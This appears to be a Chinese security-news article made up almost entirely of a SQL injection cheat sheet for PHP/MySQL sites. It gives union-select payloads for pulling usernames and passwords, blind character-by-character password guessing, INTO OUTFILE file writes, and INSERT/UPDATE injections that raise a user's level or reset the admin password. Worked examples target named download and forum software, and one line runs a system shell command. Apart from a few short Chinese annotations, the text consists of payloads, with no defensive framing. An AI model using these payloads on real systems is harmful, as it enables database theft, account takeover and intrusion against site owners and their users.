首页 > 资讯 > 网站安全 > 正文

PHP注入技术语句

08-06-12 来源：[db:作者]

收藏我要投稿

or 1=1

%23

and password=mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）

and LENGTH(password)=6（探测密码长度）

and LEFT(password,1)=m

and LEFT(password,2)=my

…………………………依次类推

union select 1,username,password from user/*

= union select 1,username,password from user/* （可以是1或者=后直接跟）

99999 union select 1,username,password from user/*

into outfile c:/file.txt （导出文件）

= or 1=1 into outfile c:/file.txt

1 union select 1,username,password from user into outfile c:/user.txt

select password FROM admins where login=John INTO DUMPFILE /path/to/site/file.txt

id= union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() （灵活应用查询）

常用查询测试语句，

select * FROM table where 1=1

select * FROM table where uuu=uuu

select * FROM table where 1<>2

select * FROM table where 3>2

select * FROM table where 2<3

select * FROM table where 1

select * FROM table where 1+1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where b BETWEEN a AND c

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

例如：夜猫下载系统1.0版本

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 （替换，寻找密码）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 （验证第一位密码）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 （第二位）

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

…………………………………………………………

例如2：灰色轨迹变换id进行测试（meteor）

union%20(select%20allowsmilies,public,userid,0000-0-0,user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,0000-0-0,pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

构造语句：

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)

union%20(select%201,0,2,1999-01-01,a,password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate

union%20(select%201,0,12695,1999-01-01,a,password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate

union%20(select%201,0,12695,1999-01-01,a,userid%20FROM%20user%20where%20username=sandflee)%20order%20by%20eventdate （查沙子的id）

（select a FROM table_name where a=10 AND B=1 orDER BY a LIMIT 10)

select * FROM article where articleid=$id union select * FROM……（字段和数据库相同情况下，可直接提交）

select * FROM article where articleid=$id union select 1,1,1,1,1,1,1 FROM……（不同的情况下）

特殊技巧：在表单，搜索引擎等地方写：

"___"

".__ "

% orDER BY articleid/*

% orDER BY articleid#

__ orDER BY articleid/*

__ orDER BY articleid#

$command = "dir c:";system($command);

select * FROM article where articleid=$id

1 and 1=2 union select * from user where userid=1/* 句中变为

(select * FROM article where articleid=1 and 1=2 union select * from user where userid=1/*)

1 and 1=2 union select * from user where userid=1

语句形式：建立一个库，插入：

create DATABASE `injection`

create TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default ,

`password` varchar(20) NOT NULL default ,

PRIMARY KEY (`userid`)

) ;

insert INTO `user` VALUES (1, swap, mypass);

插如一个注册用户：

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES (, $username, $password, $homepage, 1);

"insert INTO membres (login,password,nom,email,userlevel) VALUES ($login,$pass,$nom,$email,1)";

insert INTO membres (login,password,nom,email,userlevel) VALUES (,,,,3)#,1)

"insert INTO membres SET login=$login,password=$pass,nom=$nom,email=$email";

insert INTO membres SET login=,password=,nom=,userlevel=3,email=

"insert INTO membres VALUES ($id,$login,$pass,$nom,$email,1)";

update user SET password=$password, homepage=$homepage where id=$id

update user SET password=MD5(mypass) where username=admin#), homepage=$homepage where id=$id

"update membres SET password=$pass,nom=$nom,email=$email where id=$id";

update membres SET password=[PASS],nom=,userlevel=3,email= where id=[ID]

"update news SET Votes=Votes+1, score=score+$note where idnews=$id";

长用函数：

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

比如：

update article SET title=$title where articleid=1 对应函数

update article SET title=DATABASE() where id=1

#把当前数据库名更新到title字段

update article SET title=USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SYSTEM_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SESSION_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=CURRENT_USER() where id=1

#把当前会话被验证匹配的用户名更新到title字段

：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
$req = "select * FROM membres where name like %$search% orDER BY name";